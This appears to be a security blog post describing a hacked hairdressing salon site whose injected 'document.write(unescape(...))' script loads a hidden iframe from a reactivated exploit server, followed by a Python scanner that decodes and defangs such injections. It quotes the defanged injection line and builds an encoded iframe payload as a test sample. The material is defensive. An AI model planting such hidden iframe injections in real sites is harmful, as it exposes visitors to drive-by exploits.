An orphan no longer
One of the more interesting ideas that we monitor is that of an Orphaned Lure. That's where some site has been hacked and made into an Innocent Lure, but the exploit server it points to is offline. The Lure is now an orphan, but in a macabre parody of a B-grade horror movie the exploit server can come back to life and start serving exploits again.
This has happened tonight.
One of the common hacks that we see is an injection of some unescaped code that starts like this ...
< s c ript language="j a vascript"> document.write( unescape( '%3C%69%66%72%61%6D etc
When you decode this, it resolves to something like this ...
< iframe src=hxxp:// 81.95.nnn.nn/index.html
where nnn.nn is a substitute to save people from accidentally hurting themselves.
This IP has been offline for at least a month, maybe two, but tonight it is live again, and serving stuff.
The moral of the story is that you cannot trust a hacked site. The lure in this case is a hairdressing salon.
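The injected `document.write( unescape( ... ) )` pattern described above can be found and decoded statically, without loading the page in a browser. The following is an added example, not code from the original post: the function names, the sample page and the address 192.0.2.10 (a reserved documentation range) are constructed for illustration.

```python
import re

# Legacy JavaScript unescape(): %uXXXX is a UTF-16 code unit, %XX a Latin-1 byte.
_ESC = re.compile(r"%u([0-9A-Fa-f]{4})|%([0-9A-Fa-f]{2})")
# document.write( unescape( '...' ) ) with optional whitespace and either quote.
_WRITE = re.compile(r"document\.write\s*\(\s*unescape\s*\(\s*(['\"])(.*?)\1", re.I | re.S)
# src attribute of an iframe tag in the decoded markup (quoted or bare).
_IFRAME = re.compile(r"<\s*iframe\b[^>]*?\bsrc\s*=\s*[\"']?([^\s\"'>]+)", re.I)

# Constructed sample: a harmless page carrying the injection pattern from the post.
_MARKUP = '<iframe src="http://192.0.2.10/index.html" width=1 height=1></iframe>'
ENCODED = "".join("%%%02X" % ord(c) for c in _MARKUP)
SAMPLE_PAGE = (
    '<html><body><h1>Salon</h1><script language="javascript">'
    "document.write( unescape( '" + ENCODED + "' ) );</script></body></html>"
)


def js_unescape(text):
    """Decode a string the way unescape() would, without running any script."""
    return _ESC.sub(lambda m: chr(int(m.group(1) or m.group(2), 16)), text)


def defang(url):
    """Make a URL unclickable for reports: hxxp scheme and [.] in the host."""
    scheme, sep, rest = url.partition("://")
    if not sep:  # relative URL, nothing to neutralise
        return url
    host, slash, path = rest.partition("/")
    return scheme.replace("tt", "xx", 1) + sep + host.replace(".", "[.]") + slash + path


def find_hidden_iframes(html):
    """Return (decoded_markup, defanged_src) for every injected iframe found."""
    hits = []
    for match in _WRITE.finditer(html):
        decoded = js_unescape(match.group(2))
        for src in _IFRAME.findall(decoded):
            hits.append((decoded, defang(src)))
    return hits


if __name__ == "__main__":
    for decoded, src in find_hidden_iframes(SAMPLE_PAGE):
        print("injected iframe ->", src)
```

Because the lure keeps pointing at the same address whether or not the exploit server answers, a hit from a scan like this is worth acting on even when the target is currently offline.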